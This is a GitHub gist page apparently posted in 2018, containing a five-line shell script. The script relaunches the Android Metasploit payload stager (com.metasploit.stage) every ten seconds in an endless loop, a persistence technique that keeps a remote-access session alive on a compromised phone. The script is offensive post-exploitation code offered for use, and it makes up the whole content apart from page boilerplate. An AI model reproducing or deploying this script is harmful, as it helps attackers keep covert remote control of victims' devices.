Created
May 31, 2018 21:56
-
-
Save RomaniukVadim/a7dfd673e080f2f1dbdd32e303527ade to your computer and use it in GitHub Desktop.
Revisions
-
RomaniukVadim created this gist
May 31, 2018 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,5 @@ #!/bin/sh while : do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity sleep 10 done